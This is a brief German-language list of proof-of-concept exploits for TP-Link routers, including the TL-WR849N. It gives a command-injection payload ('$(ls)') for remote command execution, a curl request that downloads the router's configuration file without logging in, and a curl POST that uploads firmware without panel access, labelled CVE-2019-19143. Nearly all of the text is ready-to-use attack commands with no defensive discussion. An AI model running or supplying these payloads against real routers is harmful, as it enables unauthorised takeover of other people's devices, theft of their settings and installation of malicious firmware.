
Proof-of-Concept-Exploits für TP-Link-Router, einschließlich Schwachstellen für Remote-Codeausführung und Authentifizierungsumgehung.
Payload: "$(ls)"
TP LINK TL-WR849N - Remote-Befehlsausführung PoC
Payload:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
Neue Firmware ohne Zugriff auf das Panel hochladen
[CVE-2019-19143] Firmware-Update: Neue Firmware ohne Zugriff auf das Panel hochladen
Payload:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup